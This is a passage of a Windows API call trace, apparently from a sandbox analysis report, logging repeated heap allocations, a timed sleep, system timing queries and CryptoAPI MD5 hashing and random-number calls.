(in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0110.749] GetProcessHeap () returned 0xe30000 [0110.749] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0110.749] GetProcessHeap () returned 0xe30000 [0110.749] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0110.749] GetProcessHeap () returned 0xe30000 [0110.749] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0110.749] GetProcessHeap () returned 0xe30000 [0110.750] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0110.750] GetProcessHeap () returned 0xe30000 [0110.750] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0110.750] GetProcessHeap () returned 0xe30000 [0110.750] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0110.750] GetProcessHeap () returned 0xe30000 [0110.750] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825608 [0110.750] GetProcessHeap () returned 0xe30000 [0110.750] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825608 | out: hHeap=0xe30000) returned 1 [0110.750] GetProcessHeap () returned 0xe30000 [0110.750] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0110.750] GetProcessHeap () returned 0xe30000 [0110.750] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0110.750] GetProcessHeap () returned 0xe30000 [0110.750] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0110.750] GetProcessHeap () returned 0xe30000 [0110.750] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0110.750] GetProcessHeap () returned 0xe30000 [0110.750] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0110.750] GetProcessHeap () returned 0xe30000 [0110.750] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0110.750] GetProcessHeap () returned 0xe30000 [0110.750] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0110.750] GetProcessHeap () returned 0xe30000 [0110.750] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0110.750] GetProcessHeap () returned 0xe30000 [0110.750] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0110.750] GetProcessHeap () returned 0xe30000 [0110.750] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0110.750] GetProcessHeap () returned 0xe30000 [0110.750] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0110.750] GetProcessHeap () returned 0xe30000 [0110.750] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0110.751] GetProcessHeap () returned 0xe30000 [0110.751] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0110.751] GetProcessHeap () returned 0xe30000 [0110.751] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0110.751] GetProcessHeap () returned 0xe30000 [0110.751] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0110.751] GetProcessHeap () returned 0xe30000 [0110.751] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0110.751] GetProcessHeap () returned 0xe30000 [0110.751] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0110.751] GetProcessHeap () returned 0xe30000 [0110.751] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0110.751] GetProcessHeap () returned 0xe30000 [0110.751] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0110.751] GetProcessHeap () returned 0xe30000 [0110.751] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0110.751] GetProcessHeap () returned 0xe30000 [0110.751] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0110.751] GetProcessHeap () returned 0xe30000 [0110.751] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0110.751] GetProcessHeap () returned 0xe30000 [0110.751] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0110.751] GetProcessHeap () returned 0xe30000 [0110.751] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0110.751] GetProcessHeap () returned 0xe30000 [0110.751] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0110.751] GetProcessHeap () returned 0xe30000 [0110.751] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0110.751] GetProcessHeap () returned 0xe30000 [0110.751] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0110.751] GetProcessHeap () returned 0xe30000 [0110.751] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0110.751] GetProcessHeap () returned 0xe30000 [0110.751] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0110.751] GetProcessHeap () returned 0xe30000 [0110.751] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0110.751] GetProcessHeap () returned 0xe30000 [0110.751] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0110.751] GetProcessHeap () returned 0xe30000 [0110.751] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0110.751] GetProcessHeap () returned 0xe30000 [0110.752] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0110.752] GetProcessHeap () returned 0xe30000 [0110.752] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0110.752] GetProcessHeap () returned 0xe30000 [0110.752] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0110.752] GetProcessHeap () returned 0xe30000 [0110.752] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0110.752] GetProcessHeap () returned 0xe30000 [0110.752] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0110.752] GetProcessHeap () returned 0xe30000 [0110.752] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0110.752] GetProcessHeap () returned 0xe30000 [0110.752] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0110.752] GetProcessHeap () returned 0xe30000 [0110.752] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0110.752] GetProcessHeap () returned 0xe30000 [0110.752] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0110.752] GetProcessHeap () returned 0xe30000 [0110.752] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0110.752] GetProcessHeap () returned 0xe30000 [0110.752] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0110.752] GetProcessHeap () returned 0xe30000 [0110.752] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0110.752] GetProcessHeap () returned 0xe30000 [0110.752] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0110.752] GetProcessHeap () returned 0xe30000 [0110.752] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0110.752] GetProcessHeap () returned 0xe30000 [0110.752] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0110.752] GetProcessHeap () returned 0xe30000 [0110.752] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0110.752] GetProcessHeap () returned 0xe30000 [0110.752] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0110.752] GetProcessHeap () returned 0xe30000 [0110.752] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0110.752] GetProcessHeap () returned 0xe30000 [0110.752] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0110.752] GetProcessHeap () returned 0xe30000 [0110.752] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0110.752] GetProcessHeap () returned 0xe30000 [0110.752] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0110.752] GetProcessHeap () returned 0xe30000 [0110.753] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0110.753] GetProcessHeap () returned 0xe30000 [0110.753] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0110.753] GetProcessHeap () returned 0xe30000 [0110.753] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0110.753] GetProcessHeap () returned 0xe30000 [0110.753] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0110.753] GetProcessHeap () returned 0xe30000 [0110.753] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0110.753] GetProcessHeap () returned 0xe30000 [0110.753] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0110.753] GetProcessHeap () returned 0xe30000 [0110.753] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0110.753] GetProcessHeap () returned 0xe30000 [0110.753] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0110.753] GetProcessHeap () returned 0xe30000 [0110.753] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0110.753] GetProcessHeap () returned 0xe30000 [0110.753] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0110.753] GetProcessHeap () returned 0xe30000 [0110.753] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0110.753] GetProcessHeap () returned 0xe30000 [0110.753] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0110.753] GetProcessHeap () returned 0xe30000 [0110.753] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0110.753] GetProcessHeap () returned 0xe30000 [0110.753] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0110.753] GetProcessHeap () returned 0xe30000 [0110.753] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0110.753] GetProcessHeap () returned 0xe30000 [0110.753] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0110.753] GetProcessHeap () returned 0xe30000 [0110.753] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0110.753] GetProcessHeap () returned 0xe30000 [0110.753] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0110.753] GetProcessHeap () returned 0xe30000 [0110.753] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0110.753] GetProcessHeap () returned 0xe30000 [0110.753] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0110.753] GetProcessHeap () returned 0xe30000 [0110.754] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0110.754] GetProcessHeap () returned 0xe30000 [0110.754] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0110.754] GetProcessHeap () returned 0xe30000 [0110.754] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0110.754] GetProcessHeap () returned 0xe30000 [0110.754] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0110.754] GetProcessHeap () returned 0xe30000 [0110.754] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0110.754] GetProcessHeap () returned 0xe30000 [0110.754] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0110.754] GetProcessHeap () returned 0xe30000 [0110.754] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0110.754] GetProcessHeap () returned 0xe30000 [0110.754] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0110.754] GetProcessHeap () returned 0xe30000 [0110.754] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0110.755] GetProcessHeap () returned 0xe30000 [0110.755] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf0daf8 | out: hHeap=0xe30000) returned 1 [0110.755] GetProcessHeap () returned 0xe30000 [0110.755] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0110.755] GetProcessHeap () returned 0xe30000 [0110.755] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf2bbc8 | out: hHeap=0xe30000) returned 1 [0110.755] GetProcessHeap () returned 0xe30000 [0110.755] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed4530 | out: hHeap=0xe30000) returned 1 [0110.755] Sleep (dwMilliseconds=0xea60) [0120.769] GetTickCount () returned 0x11a88fa [0120.771] GetProcessHeap () returned 0xe30000 [0120.771] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x2080) returned 0xecab68 [0120.776] RegQueryValueExA (in: hKey=0x80000004, lpValueName="2", lpReserved=0x0, lpType=0x0, lpData=0xecab68, lpcbData=0x2dee40c*=0x2000 | out: lpType=0x0, lpData=0xecab68*=0x50, lpcbData=0x2dee40c*=0x3d8) returned 0x0 [0120.780] GetProcessHeap () returned 0xe30000 [0120.780] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecab68 | out: hHeap=0xe30000) returned 1 [0120.780] GetTickCount () returned 0x11a890a [0120.780] GetSystemTimes (in: lpIdleTime=0x859da4, lpKernelTime=0x859dac, lpUserTime=0x859db4 | out: lpIdleTime=0x859da4, lpKernelTime=0x859dac, lpUserTime=0x859db4) returned 1 [0120.781] GetCurrentProcess () returned 0xffffffff [0120.781] GetProcessTimes (in: hProcess=0xffffffff, lpCreationTime=0x859dbc, lpExitTime=0x859dc4, lpKernelTime=0x859dcc, lpUserTime=0x859dd4 | out: lpCreationTime=0x859dbc, lpExitTime=0x859dc4, lpKernelTime=0x859dcc, lpUserTime=0x859dd4) returned 1 [0120.781] CryptAcquireContextA (in: phProv=0x2dee408, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2dee408*=0xed46f0) returned 1 [0120.781] CryptCreateHash (in: hProv=0xed46f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2dee40c | out: phHash=0x2dee40c) returned 1 [0120.781] CryptHashData (hHash=0xec2030, pbData=0x859c10, dwDataLen=0x1cc, dwFlags=0x0) returned 1 [0120.781] CryptGetHashParam (in: hHash=0xec2030, dwParam=0x4, pbData=0x2dee404, pdwDataLen=0x2dee400, dwFlags=0x0 | out: pbData=0x2dee404, pdwDataLen=0x2dee400) returned 1 [0120.781] CryptGetHashParam (in: hHash=0xec2030, dwParam=0x2, pbData=0x2dee428, pdwDataLen=0x2dee404, dwFlags=0x0 | out: pbData=0x2dee428, pdwDataLen=0x2dee404) returned 1 [0120.781] CryptDestroyHash (hHash=0xec2030) returned 1 [0120.781] CryptReleaseContext (hProv=0xed46f0, dwFlags=0x0) returned 1 [0120.781] GetProcessHeap () returned 0xe30000 [0120.782] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x184) returned 0xed4530 [0120.782] wnsprintfA (in: pszDest=0xed4530, cchDest=4, pszFmt="%02x" | out: pszDest="5f") returned 2 [0120.782] wnsprintfA (in: pszDest=0xed4532, cchDest=4, pszFmt="%02x" | out: pszDest="79") returned 2 [0120.782] wnsprintfA (in: pszDest=0xed4534, cchDest=4, pszFmt="%02x" | out: pszDest="b6") returned 2 [0120.782] wnsprintfA (in: pszDest=0xed4536, cchDest=4, pszFmt="%02x" | out: pszDest="0e") returned 2 [0120.782] wnsprintfA (in: pszDest=0xed4538, cchDest=4, pszFmt="%02x" | out: pszDest="55") returned 2 [0120.782] wnsprintfA (in: pszDest=0xed453a, cchDest=4, pszFmt="%02x" | out: pszDest="60") returned 2 [0120.782] wnsprintfA (in: pszDest=0xed453c, cchDest=4, pszFmt="%02x" | out: pszDest="02") returned 2 [0120.782] wnsprintfA (in: pszDest=0xed453e, cchDest=4, pszFmt="%02x" | out: pszDest="f5") returned 2 [0120.782] wnsprintfA (in: pszDest=0xed4540, cchDest=4, pszFmt="%02x" | out: pszDest="44") returned 2 [0120.782] wnsprintfA (in: pszDest=0xed4542, cchDest=4, pszFmt="%02x" | out: pszDest="66") returned 2 [0120.782] wnsprintfA (in: pszDest=0xed4544, cchDest=4, pszFmt="%02x" | out: pszDest="91") returned 2 [0120.782] wnsprintfA (in: pszDest=0xed4546, cchDest=4, pszFmt="%02x" | out: pszDest="98") returned 2 [0120.782] wnsprintfA (in: pszDest=0xed4548, cchDest=4, pszFmt="%02x" | out: pszDest="07") returned 2 [0120.782] wnsprintfA (in: pszDest=0xed454a, cchDest=4, pszFmt="%02x" | out: pszDest="cc") returned 2 [0120.782] wnsprintfA (in: pszDest=0xed454c, cchDest=4, pszFmt="%02x" | out: pszDest="6f") returned 2 [0120.782] wnsprintfA (in: pszDest=0xed454e, cchDest=4, pszFmt="%02x" | out: pszDest="37") returned 2 [0120.782] CryptAcquireContextW (in: phProv=0x2dee18c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2dee18c*=0xed54c0) returned 1 [0120.783] CryptGenRandom (in: hProv=0xed54c0, dwLen=0x80, pbBuffer=0x2dee1a0 | out: pbBuffer=0x2dee1a0) returned 1 [0120.783] CryptReleaseContext (hProv=0xed54c0, dwFlags=0x0) returned 1 [0120.783] GetProcessHeap () returned 0xe30000 [0120.783] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x280) returned 0xf2b430 [0120.783] GetProcessHeap () returned 0xe30000 [0120.783] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x84) returned 0x6825728 [0120.783] GetProcessHeap () returned 0xe30000 [0120.784] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x280) returned 0xf2b6b8 [0120.784] GetProcessHeap () returned 0xe30000 [0120.784] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x284) returned 0x6811b10 [0120.784] GetProcessHeap () returned 0xe30000 [0120.784] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf2b6b8 | out: hHeap=0xe30000) returned 1 [0120.784] GetProcessHeap () returned 0xe30000 [0120.784] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x284) returned 0x68105d0 [0120.784] GetProcessHeap () returned 0xe30000 [0120.784] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x488) returned 0xee8818 [0120.784] GetProcessHeap () returned 0xe30000 [0120.784] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x84) returned 0x6826028 [0120.784] GetProcessHeap () returned 0xe30000 [0120.784] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0xf0daf8 [0120.784] GetProcessHeap () returned 0xe30000 [0120.784] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0120.784] GetProcessHeap () returned 0xe30000 [0120.784] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0x6874278 [0120.784] GetProcessHeap () returned 0xe30000 [0120.784] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x280) returned 0xf2b6b8 [0120.784] GetProcessHeap () returned 0xe30000 [0120.784] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x48c) returned 0xef3600 [0120.784] GetProcessHeap () returned 0xe30000 [0120.784] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0120.784] GetProcessHeap () returned 0xe30000 [0120.784] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x8c) returned 0xe9f980 [0120.784] GetProcessHeap () returned 0xe30000 [0120.784] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x284) returned 0x6811318 [0120.784] GetProcessHeap () returned 0xe30000 [0120.784] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf2b6b8 | out: hHeap=0xe30000) returned 1 [0120.784] GetProcessHeap () returned 0xe30000 [0120.784] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0xed39f8 [0120.784] GetProcessHeap () returned 0xe30000 [0120.784] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6811318 | out: hHeap=0xe30000) returned 1 [0120.784] GetProcessHeap () returned 0xe30000 [0120.784] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0120.784] GetProcessHeap () returned 0xe30000 [0120.785] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x8c) returned 0xe9fbe0 [0120.785] GetProcessHeap () returned 0xe30000 [0120.785] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0120.785] GetProcessHeap () returned 0xe30000 [0120.785] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0120.785] GetProcessHeap () returned 0xe30000 [0120.785] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0120.785] GetProcessHeap () returned 0xe30000 [0120.785] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0120.785] GetProcessHeap () returned 0xe30000 [0120.785] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x288) returned 0x6810878 [0120.785] GetProcessHeap () returned 0xe30000 [0120.785] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9fbe0 | out: hHeap=0xe30000) returned 1 [0120.785] GetProcessHeap () returned 0xe30000 [0120.785] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0xed90d0 [0120.785] GetProcessHeap () returned 0xe30000 [0120.785] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6810878 | out: hHeap=0xe30000) returned 1 [0120.785] GetProcessHeap () returned 0xe30000 [0120.785] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0120.785] GetProcessHeap () returned 0xe30000 [0120.785] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0120.785] GetProcessHeap () returned 0xe30000 [0120.785] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0120.785] GetProcessHeap () returned 0xe30000 [0120.785] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0120.785] GetProcessHeap () returned 0xe30000 [0120.785] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0120.785] GetProcessHeap () returned 0xe30000 [0120.785] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0120.785] GetProcessHeap () returned 0xe30000 [0120.785] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0120.785] GetProcessHeap () returned 0xe30000 [0120.785] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0120.785] GetProcessHeap () returned 0xe30000 [0120.785] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0120.785] GetProcessHeap () returned 0xe30000 [0120.786] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0120.786] GetProcessHeap () returned 0xe30000 [0120.786] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0120.786] GetProcessHeap () returned 0xe30000 [0120.786] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0120.786] GetProcessHeap () returned 0xe30000 [0120.786] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0120.786] GetProcessHeap () returned 0xe30000 [0120.786] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0120.786] GetProcessHeap () returned 0xe30000 [0120.786] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0120.786] GetProcessHeap () returned 0xe30000 [0120.786] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0120.786] GetProcessHeap () returned 0xe30000 [0120.786] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0120.786] GetProcessHeap () returned 0xe30000 [0120.786] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0120.786] GetProcessHeap () returned 0xe30000 [0120.786] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0120.786] GetProcessHeap () returned 0xe30000 [0120.786] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0120.786] GetProcessHeap () returned 0xe30000 [0120.786] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0120.786] GetProcessHeap () returned 0xe30000 [0120.786] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0120.786] GetProcessHeap () returned 0xe30000 [0120.786] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0120.786] GetProcessHeap () returned 0xe30000 [0120.786] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0120.786] GetProcessHeap () returned 0xe30000 [0120.786] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0120.786] GetProcessHeap () returned 0xe30000 [0120.786] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, 